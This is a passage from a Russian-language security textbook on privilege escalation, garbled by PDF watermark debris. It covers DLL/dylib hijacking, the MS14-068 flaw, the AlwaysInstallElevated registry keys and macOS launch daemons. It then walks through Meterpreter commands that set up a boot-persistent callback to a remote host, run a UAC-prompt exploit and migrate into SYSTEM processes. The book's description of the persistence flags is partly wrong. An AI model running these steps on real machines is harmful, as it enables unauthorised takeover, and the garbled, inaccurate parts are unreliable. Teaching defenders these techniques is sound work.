|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|||
|
|
|
C |
|
E |
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|||||||
|
|
X |
|
|
|
|
|
|
|
|
|
|
X |
|
|
|
|
|
|
|
|||||||
|
- |
|
|
|
|
|
d |
|
|
|
|
- |
|
|
|
|
|
|
|
d |
|
||||||
|
F |
|
|
|
|
|
|
|
t |
|
|
|
|
F |
|
|
|
|
|
|
|
|
|
t |
|
||
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
D |
|
|
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
|
|
|
|
|
|
|
|
|
|
|
|
r |
|||||
P |
|
|
|
|
|
NOW! |
o |
|
P |
|
|
|
|
|
|
|
NOW! |
o |
|||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||
|
|
|
|
|
BUY |
|
|
|
Выполнение повышения привилегий 173to |
BUY |
|
|
|||||||||||||||
|
|
|
|
to |
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||
w Click |
|
|
|
|
|
|
|
|
m |
|
w Click |
|
|
|
|
|
|
|
|
m |
|||||||
w |
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
|
|
||
|
w |
|
|
|
|
|
|
|
|
o |
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
o |
|
|
|
. |
|
|
|
|
g |
.c |
|
|
|
|
. |
|
|
|
|
|
|
g |
.c |
|
||||||
|
|
p |
|
|
|
|
|
|
|
|
|
|
|
p |
|
|
|
|
|
|
|
|
|
||||
|
|
|
df |
|
|
n |
e |
|
|
|
|
|
|
df |
|
|
|
n |
e |
|
|||||||
|
|
|
|
|
|
ческие библиотеки,которые используются конкретными приложениями,а за- |
|
|
|
|
|
|
|
||||||||||||||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
|
|
|
|
-x cha |
|
|
|
|
|
|||||
|
|
|
|
|
|
тем помещают вредоносную версию с аналогичным именем в верхнюю часть |
|
|
|
|
|
|
|
||||||||||||||
|
|
|
|
|
|
списка путей поиска. Поэтому когда операционная система ищет динамиче- |
|
|
|
|
|
|
|
||||||||||||||
|
|
|
|
|
|
скуюбиблиотекуприложения,онасначаланаходитвредоносную.Еслицелевая |
|
|
|
|
|
|
|
||||||||||||||
|
|
|
|
|
|
программа запускается с привилегиями более высокого уровня,по сравнению |
|
|
|
|
|
|
|
||||||||||||||
|
|
|
|
|
|
с пользователем компьютера, при запуске она автоматически повышает при- |
|
|
|
|
|
|
|
||||||||||||||
|
|
|
|
|
|
вилегии. В этом случае также получается доступ на уровне администратора |
|
|
|
|
|
|
|
||||||||||||||
|
|
|
|
|
|
к вредоносной библиотеке. |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Windows сначала находит |
Windows не получает |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
вредоносный DLL-файл |
легитимный DLL-файл |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Работающая программа |
Хакер вставляет вредоносную DLL |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
запрашивает DLL-файл |
в путь поиска |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Рис.8.10 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Приведенная ниже диаграмма иллюстрирует процесс перехвата dylib, когда |
|
|
|
|
|
|
|
||||||||||
|
|
|
|
|
|
злоумышленникипомещаютвредоноснуюбиблиотекувпутьпоиска(рис.8.11). |
|
|
|
|
|
|
|
||||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||
|
|
|
|
|
|
|
|
|
|
|
|
|
ОС сначала находит |
К легитимной dylib доступ |
|
|
|
|
|
|
|
|
|
|
|||
|
|
|
|
|
|
|
|
|
|
|
|
|
вредоносный файл |
так и не был получен |
|
|
|
|
|
|
|
|
|
|
|
|
|
Работающая программа запрашивает dylib
Хакер вставляет вредоносную библиотеку с тем же именем в путь поиска
Рис.8.11
Исследование уязвимостей
Исследование уязвимостей – один из немногих типов горизонтальных повы- шений привилегий, которые используются сегодня. Из-за строгости кодиро- вания и защиты систем, как правило, случаев горизонтального повышения привилегий стало меньше. Данный тип повышения привилегий осуществим для систем и программ, содержащих ошибки программирования. Эти ошиб- ки могут создавать уязвимости, которые злоумышленники способны эксплу-
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
||
|
|
|
C |
|
E |
|
|
|
|
|
|
C |
|
E |
|
|
|
||||||
|
|
X |
|
|
|
|
|
|
|
|
X |
|
|
|
|
|
|
||||||
|
- |
|
|
|
|
|
d |
|
|
- |
|
|
|
|
|
d |
|
||||||
|
F |
|
|
|
|
|
|
|
t |
|
|
F |
|
|
|
|
|
|
|
t |
|
||
|
D |
|
|
|
|
|
|
|
|
i |
|
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
|
|
|
|
|
|
|
|
|
r |
||||
P |
|
|
|
|
|
NOW! |
o |
P |
|
|
|
|
|
NOW! |
o |
||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||
|
|
|
|
|
BUY |
|
|
|
|
|
|
|
BUY |
|
|
||||||||
|
|
|
|
to |
174 Повышение привилегий |
|
|
|
|
to |
|
|
|
|
|
|
|||||||
w Click |
|
w Click |
|
|
|
|
|
|
|
||||||||||||||
|
|
|
|
|
|
|
m |
|
|
|
|
|
|
|
m |
||||||||
w |
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
||
|
w |
|
|
|
|
|
|
|
|
o |
|
|
w |
|
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
g |
.c |
|
|
. |
|
|
|
|
g |
.c |
|
||||||
|
|
p |
|
|
|
|
|
|
|
|
|
p |
|
|
|
|
|
|
|
||||
|
|
|
df |
|
|
n |
e |
|
|
|
|
df |
|
|
n |
e |
|
||||||
|
|
|
|
|
|
атировать для обхода механизмов безопасности. Некоторые системы будут |
|
|
|
|
|
|
|
||||||||||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
|
-x cha |
|
|
|
|
|
||||
принимать определенные фразы в качестве паролей для всех пользователей. Это может быть ошибкой программирования, позволяющей разработчикам систем быстро получатьдоступ к ним.Однако злоумышленники могутбыстро обнаружить этот недостаток и использовать его для доступа к учетным запи- сям пользователей с высокими привилегиями.Другие ошибки в кодировании могут позволить злоумышленникам изменить уровни доступа пользователей в URL-адресе веб-системы.В Windows была программная ошибка,которая по- зволяла злоумышленникам создавать собственные мандаты Kerberos с права- ми администратора домена, используя обычные права доступа пользователя домена. Эта уязвимость носит название MS14-068. Несмотря на то что раз- работчики системы могут быть чрезвычайно осторожны, эти ошибки иногда появляются, предоставляя злоумышленникам возможность быстро повысить привилегии.
Иногда злоумышленник может воспользоваться преимуществами операци- онной системы для эксплуатации неизвестной уязвимости.
Классический пример – использование раздела реестра AlwaysInstallElevated, который присутствует в системе (установлен на 1) и позволяет установить пакет установщика Windows с повышенными (системными) привилегиями. Чтобы этот ключ считался включенным, нужно установить на 1 следующие значения:
[HKEY_CURRENT_USERSOFTWAREPoliciesMicrosoftWindowsInstaller] "AlwaysInstallElevated"=dword:00000001 [HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller] "AlwaysInstallElevated"=dword:00000001
Злоумышленник может использовать команду reg query, чтобы проверить, присутствует ли этот ключ. Если нет, то появится сообщение, показанное на рис. 8.12.
Рис.8.12
Возможно, это звучит безобидно, но если вдуматься, то можно заметить проблему . В основном вы предоставляете привилегии системного уровня обычномупользователюдлязапускаустановщика.Чтоделать,еслипакетуста- новщика содержит вредоносное содержимое? Game over!
Запускаемые демоны
Использование запускаемых демонов – еще один метод повышения приви- легий, применимый к операционным системам на базе Apple, в особенности
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
||
|
|
|
C |
|
E |
|
|
|
|
|
|
C |
|
E |
|
|
|
||||||
|
|
X |
|
|
|
|
|
|
|
|
X |
|
|
|
|
|
|
||||||
|
- |
|
|
|
|
|
d |
|
|
- |
|
|
|
|
|
d |
|
||||||
|
F |
|
|
|
|
|
|
|
t |
|
|
F |
|
|
|
|
|
|
|
t |
|
||
|
D |
|
|
|
|
|
|
|
|
i |
|
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
|
|
|
|
|
|
|
|
|
r |
||||
P |
|
|
|
|
|
NOW! |
o |
P |
|
|
|
|
|
NOW! |
o |
||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||
|
|
|
|
|
BUY |
|
|
Выполнение повышения привилегий 175to |
BUY |
|
|
||||||||||||
|
|
|
|
to |
|
|
|
|
|
|
|
|
|
|
|
|
|||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||
w Click |
|
|
|
|
|
|
|
m |
w Click |
|
|
|
|
|
|
|
m |
||||||
w |
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
||
|
w |
|
|
|
|
|
|
|
|
o |
|
|
w |
|
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
g |
.c |
|
|
. |
|
|
|
|
g |
.c |
|
||||||
|
|
p |
|
|
|
|
|
|
|
|
|
p |
|
|
|
|
|
|
|
||||
|
|
|
df |
|
|
n |
e |
|
|
|
|
df |
|
|
n |
e |
|
||||||
|
|
|
|
|
|
OS X. При загрузке OS X обычно запускается launchd для завершения инициа |
|
|
|
|
|
|
|
||||||||||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
|
-x cha |
|
|
|
|
|
||||
лизации системы. Этот процесс отвечает за загрузку параметров демонов из файлов plist, находящихся в /Library/LaunchDaemons. У демонов есть файлы списка свойств,указывающие на исполняемые файлы,которые должны быть запущены автоматически. Злоумышленники могут воспользоваться этим процессом автозапуска для повышения привилегий. Они могут установить собственные демоны для запуска и настроить их на запуск во время про- цесса загрузки, используя процесс launchd. Демоны злоумышленников могут получить замаскированные имена, похожие на относящиеся к ним ОС или приложения. Запускаемые демоны создаются с правами администратора, но выполняются с правами root.Поэтому если злоумышленники добьются успе- ха, указанные ими демоны будут запущены автоматически, а их привилегии расширены от администратора до пользователя root. Можно заметить, что злоумышленники снова используют легитимный процесс для повышения привилегий.
Практический пример повышения привилегий в Windows 8
Этот практический пример работает в Windows 8,а также,как сообщалось,эф- фективен и для Windows 10. В нем используются методы, о которых уже шла речь,аименноPowerShellиMeterpreter.Этотхитрыйметодвынуждаетпользо- вателякомпьютера,выбранноговкачествеобъектаатаки,невольноразрешать запуск легитимной программы, которая, в свою очередь, повышает привиле- гии. Следовательно, именно пользователь неосознанно позволяет злоумыш- ленникам наращивать свои привилегии. Процесс начинается в Metasploit и особенно в Meterpreter. Вначале используется Meterpreter для установления соединения с жертвой. Это соединение нужно злоумышленникам для отправ- ки команд на компьютер жертвы и эффективного управления ею.
Ниже приведен сценарий, называющийся persistence, который злоумыш- ленник может использовать для запуска сеанса с удаленной целью. Сценарий создает постоянного слушателя в системе жертвы, который запускается при загрузке.
Вот как это выглядит:
meterpreter >run persistence -A -L c:\ -X 30 -p 443 -r 10.108.210.25
Эта команда запускает обработчик на жертве (A), помещает Meterpreter на диск C компьютера-жертвы (L c: \) и даетслушателю указание запуститься при загрузке (X),выполнитьпроверку с интервалом в 30 с (i 30) и отвечатьна порту 443 IP-адреса жертвы. Хакер может проверить, было ли соединение простым, отправив команду reboot на компьютер жертвы и наблюдая за ее поведением.
Команда reboot выглядиттак:
Meterpreter> reboot
Если результаты удовлетворительны, злоумышленник может установить фоновую сессию и предпринять попытку повышения привилегий. Meterpreter
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
C |
|
E |
|
|
||
|
|
X |
|
|
|
|
|
||
|
- |
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
||
|
|
|
|
|
|
|
|||
|
|
|
|
|
BUY |
|
|
||
|
|
|
|
to |
176 Повышение привилегий |
||||
w Click |
|
||||||||
|
|
|
|
|
m |
||||
w |
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
df |
|
|
|
e |
|
|
|
|
|
|
|
n |
|
|
||
|
|
|
|
|
|
запустит сеанс в фоновом режиме и позволит |
|||
|
|
|
|
-xcha |
|
|
|
||
действия.
В терминале Metasploit выдается команда
Metasploit
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
выполнять другие |
|
|
|
|
|
|
||||
|
|
|
|
-x cha |
|
|
|
|
||
Msf exploit (handler)> Use exploit/windows/local/ask
ЭтакомандаработаетвовсехверсияхWindows.Онаиспользуетсядлязапро- са, чтобы пользователь на компьютере, выбранном в качестве цели, невольно повышал уровень выполнения атакующего. Пользователь должен щелкнуть ОК при появлении на экране ничего не предвещающей подсказки с запросом разрешения на запуск программы. Требуется согласие пользователя. Если оно не будет дано, попытка повышения привилегий не будет успешной. Поэтому злоумышленник должен попросить пользователя разрешить запуск легитим- ной программы, и именно здесь в действие вступает PowerShell. Следователь- но, злоумышленникам необходимо использовать ask с помощью PowerShell. Вот как это делается:
Msf exploit(ask)> set TECHNIQUE PSH
Msf exploit(ask)> run
Вэтотмоментнаэкранежертвыпоявитсявсплывающееокноспредложени- ем разрешить запуск PowerShell, полностью легитимной программы Windows. В большинстве случаев пользователь нажимает кнопку ОК. Получив разреше- ние, злоумышленник может использовать PowerShell для перехода от обычно- го пользователя к системному пользователю следующим образом:
Meterpreter> migrate 1340
Таким образом, 1340 указан как системный пользователь Metasploit. В слу- чае успеха злоумышленники получат больше привилегий. Проверка привиле- гий,которыми располагаютзлоумышленники,должна показать,что у них есть права администратора и системы. Тем не менее у администратора 1340 только четыре привилегии Windows,и их недостаточнодля выполнения крупной ата- ки. Злоумышленник должен наращивать свои привилегии, чтобы иметь воз- можность совершать больше вредоносных действий. Затем злоумышленники могут перейти на 3772, который является пользователем NT AuthoritySystem. Это можно сделать с помощью следующей команды:
Meterpreter> migrate 3772
У злоумышленников по-прежнему будут права администратора и пользо- вателя root, а также дополнительные привилегии Windows. Эти дополнитель- ные привилегии,коих 13,могутпозволитьзлоумышленникам совершитьмно жество действий с жертвой, используя Metasploit.
Выводы
В этой главе мы обсудили один из самых сложных этапов атаки. Хотя не все методы, используемые здесь, сложны. Как уже было сказано, есть два мето-